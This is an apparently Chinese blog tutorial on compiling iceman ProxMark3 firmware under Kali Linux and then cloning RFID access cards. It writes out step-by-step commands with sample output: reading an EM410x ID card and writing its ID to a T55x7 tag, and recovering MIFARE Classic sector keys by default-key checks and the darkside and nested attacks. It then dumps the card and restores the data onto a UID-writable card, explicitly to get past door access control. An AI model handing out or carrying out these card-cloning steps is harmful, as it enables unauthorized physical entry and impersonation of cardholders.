2018-06-19：ProxMark3 复制IC卡，IC卡

一、Kali Linux下ProxMark3客户端的编译和升级

以iceman的固件为例，iceman的固件提供了更多的特性，更新也更快。

1.安装依赖

sudo apt-get install p7zip git build-essential
sudo apt-get install libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config 
sudo apt-get install wget libncurses5-dev gcc-arm-none-eabi

2.复制iceman仓库，编译客户端

cd ~ ##切换到用户目录
git clone https://github.com/iceman1001/proxmark3.git ##克隆仓库
cd /proxmark3 ##进入目录
git pull ##更新仓库，后续升级可以直接从这一步开始
make clean && make all ##编译仓库

3.升级ProxMark3的固件

很多新手都会被所谓老鸟或者商家警告，不要自己刷固件，不要刷boot，容易让PM3变砖。实际上，一旦遇到固件升级失败，或者刷了相互不匹配的boot和image，只需要插拔PM3和刷固件的时候，按住PM3上的按钮进行强刷。在windows下面，遇到固件出错，电脑不识别的时候，也是只要一直按住PM3上的按钮即可把固件强刷到PM3里面。

sudo client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf
##调用client文件夹里的flasher刷写程序写入固件，先写入boot
client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf
##刷入镜像文件

其中设备的接口ACM0，通过下面的命令查看

dmesg | grep -i usb

如果是老版本的驱动，会采用HID的方式连接，需要升级成新版本的CDC方式。

二、ID和IC卡的复制攻击

1.判断卡类型的技巧

##进入proxmark3客户端
client/proxmark3 /dev/ttyACM0

hw tune
##测试信号是否正常，回显结果如下
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...          
....          
[+] LF antenna: 24.08 V - 125.00 kHz          
[+] LF antenna: 21.10 V - 134.00 kHz          
[+] LF optimal: 24.50 V - 126.32 kHz          
[+] LF antenna is OK           
[+] HF antenna: 15.37 V - 13.56 MHz          
[+] HF antenna is OK          
          
[+]  Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.          
pm3 --> 

没有放入任何卡的时候，高频天线的电压是15.37V，或者根据实际情况有所不同，这是高频天线的非工作电压。

##放入高频卡时的电压变化
pm3 --> hw tune
[=] measuring antenna characteristics, please wait...
...
[+] LF antenna: 24.08 V - 125.00 kHz          
[+] LF antenna: 21.10 V - 134.00 kHz          
[+] LF optimal: 24.50 V - 126.32 kHz          
[+] LF antenna is OK 
[+] HF antenna: 14.20 V - 13.56 MHz          
[+] HF antenna is OK                    
[+]  Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

电压下降了1V多，如果放在高频天线上的是低频卡，电压变化幅度不大。利用这个方法，可以简单的判断一下卡的类型。

pm3 --> hw tune          
[=] measuring antenna characteristics, please wait...          
....          
[+] LF antenna: 24.08 V - 125.00 kHz          
[+] LF antenna: 21.10 V - 134.00 kHz          
[+] LF optimal: 24.50 V - 126.32 kHz          
[+] LF antenna is OK 
   
[+] HF antenna: 15.74 V - 13.56 MHz          
[+] HF antenna is OK                    
[+]  Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

2.ID卡（低频:LF）复制

ID卡是出厂时写死ID，不可修改的低频卡。一般ID卡，仅仅是判断该卡的ID是否在数据库中，在就放行，不在就拒绝。所以只要把ID卡的ID写入到可复制的ID中，就可以过门禁。

##将ID卡放到proxmark3的低频天线上。
##读取ID的信息，其中lf是指采用低频工具包
pm3 --> lf search
NOTE: some demods output possible binary
  if it finds something that looks like a tag          
False Positives ARE possible
Checking for known tags:
          
EM410x  pattern found          

EM TAG ID      : 08003C9F5F          

Possible de-scramble patterns          
Unique TAG ID  : 10003CF9FA          
HoneyWell IdentKey {          
DEZ 8          : 03972959          
DEZ 10         : 0003972959          
DEZ 5.5        : 00060.40799          
DEZ 3.5A       : 008.40799          
DEZ 3.5B       : 000.40799          
DEZ 3.5C       : 060.40799          
DEZ 14/IK2     : 00034363711327          
DEZ 15/IK3     : 000068723472890          
DEZ 20/ZK      : 01000000031215091510          
}
Other          : 40799_060_03972959          
Pattern Paxton : 139517279 [0x850DD5F]          
Pattern 1      : 5597182 [0x5567FE]          
Pattern Sebury : 40799 60 3972959  [0x9F5F 0x3C 0x3C9F5F]               
[+] Valid EM410x ID Found!

从回显结果，可以获知卡的类型是EM410x,EM ID是08003C9F5F。接着直接写入新卡

if em 410x_write工具写入，最后1和64是写入的数据块大小

pm3 --> lf em 410x_write 08003C9F5F 1 64
Writing T55x7 tag with UID 0x08003c9f5f (clock rate: 64)          
#db# Started writing T55x7 tag ...          
#db# Clock rate: 64          
#db# Tag T55x7 written with 0xff822001b12f2bd6

3.IC卡复制

1读卡：hf 14a info

pm3 --> hf 14a info
 UID : 15 54 C6 AC           
ATQA : 00 04          
 SAK : 08 [2]          
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 | 1k Ev1          
[=] proprietary non iso14443-4 card found, RATS not supported          
[=] Answers to magic commands: NO          
[+] Prng detection: WEAK          
pm3 --> 

可以得到这张卡的UID是1554C6AC，卡的类型是mifare c1,即m1卡，存储空间时1k

2.破解卡的加密信息：弱口令测试
很多m1的卡，都采用出厂的弱口令，可以直接试出密码信息
hf mf chk *1 ? t

pm3 --> hf mf chk *1 ? t
No key specified, trying default keys          
[ 0] ffffffffffff          
[ 1] 000000000000          
[ 2] a0a1a2a3a4a5          
[ 3] b0b1b2b3b4b5          
[ 4] c0c1c2c3c4c5          
[ 5] d0d1d2d3d4d5          
[ 6] aabbccddeeff          
[ 7] 1a2b3c4d5e6f          
[ 8] 123456789abc          
[ 9] 010203040506          
[10] 123456abcdef          
[11] abcdef123456          
[12] 4d3a99c351dd          
[13] 1a982c7e459a          
[14] d3f7d3f7d3f7          
[15] 714c5c886e97          
[16] 587ee5f9350f          
[17] a0478cc39091          
[18] 533cb6c723f6          
[19] 8fd0a4f256e9          
................................
Time in checkkeys: 10 seconds
          
testing to read key B...          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ------------  | 0 |  ------------  | 0 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|010|  ------------  | 0 |  ffffffffffff  | 1 |          
|011|  ------------  | 0 |  ffffffffffff  | 1 |          
|012|  ------------  | 0 |  ffffffffffff  | 1 |          
|013|  ------------  | 0 |  ffffffffffff  | 1 |          
|014|  ------------  | 0 |  ffffffffffff  | 1 |          
|015|  ------------  | 0 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---|          
Found keys have been transferred to the emulator memory   

回显的标识key a,key b就是每个扇区的密码，接着可以利用nested攻击，获取所有扇区的密码

2.破解卡的加密信息：darkside攻击
另外一种获取扇区密码的方式,如果不是冰人固件，修改为mfare
hf mf darkside

pm3 --> hf mf darkside
--------------------------------------------------------------------------------
          
executing Darkside attack. Expected execution time: 25sec on average          
press pm3-button on the proxmark3 device to abort both proxmark3 and client.          
--------------------------------------------------------------------------------
           
[+] Parity is all zero. Most likely this card sends NACK on every authentication.          
[-] no candidates found, trying again          
.          
[-] no candidates found, trying again          
.          
[+] found 12 candidate keys.
                    
[+] found valid key: ffffffffffff

得到一个有效的秘钥

3.破解卡的加密信息：获取全扇区秘钥
hf mf nested 1 0 A ffffffffffff d

pm3 --> hf mf nested 1 0 A ffffffffffff d
[+] Testing known keys. Sector count=16          

[-] Chunk: 1.4s | found 24/32 keys (21)          
[+] Time to check 20 known keys: 1 seconds
          
[+] enter nested attack          
[+] target block: 20 key type: A          
[+] target block: 20 key type: B  -- found valid key [eba93a57cfe0]          

[-] Chunk: 0.5s | found 1/32 keys (1)          
[+] target block: 40 key type: A          
[+] target block: 44 key type: A          
[+] target block: 48 key type: A  -- found valid key [505df95da97b]          

[-] Chunk: 0.5s | found 21/32 keys (1)          
[+] target block: 20 key type: A  -- found valid key [1456c5a8301f]          

[-] Chunk: 0.6s | found 2/32 keys (1)          
[+] time in nested: 8 seconds
          
[+] trying to read key B...          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  1456c5a8301f  | 1 |  eba93a57cfe0  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|010|  505df95da97b  | 1 |  ffffffffffff  | 1 |          
|011|  505df95da97b  | 1 |  ffffffffffff  | 1 |          
|012|  505df95da97b  | 1 |  ffffffffffff  | 1 |          
|013|  505df95da97b  | 1 |  ffffffffffff  | 1 |          
|014|  505df95da97b  | 1 |  ffffffffffff  | 1 |          
|015|  505df95da97b  | 1 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---|          
[+] saving keys to binary file hf-mf-1554C6AC-key.bin...  

获取全扇区的秘钥，并把二进制文件保存为*.bin,此时可以读取每一个扇区的数据

4.读取全扇区数据
hf mf dump

pm3 --> hf mf dump
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
|-----------------------------------------|          
|----- Dumping all blocks to file... -----|          
|-----------------------------------------|          
[+] successfully read block  0 of sector  0.          
[+] successfully read block  1 of sector  0.          
[+] successfully read block  2 of sector  0.          
[+] successfully read block  3 of sector  0.          
     
[+] successfully read block  1 of sector 15.          
[+] successfully read block  2 of sector 15.          
[+] successfully read block  3 of sector 15.          
[+] dumped 64 blocks (1024 bytes) to file hf-mf-1554C6AC-data.bin   

成功写入文件

5.设置新卡uid，并写入全部数据完成复制
把可写的IC卡放到高频天线上，先写入读卡时获得的uid，再写入全扇区数据。

hf mf csetuid xxxxxxxx w
hf mf restore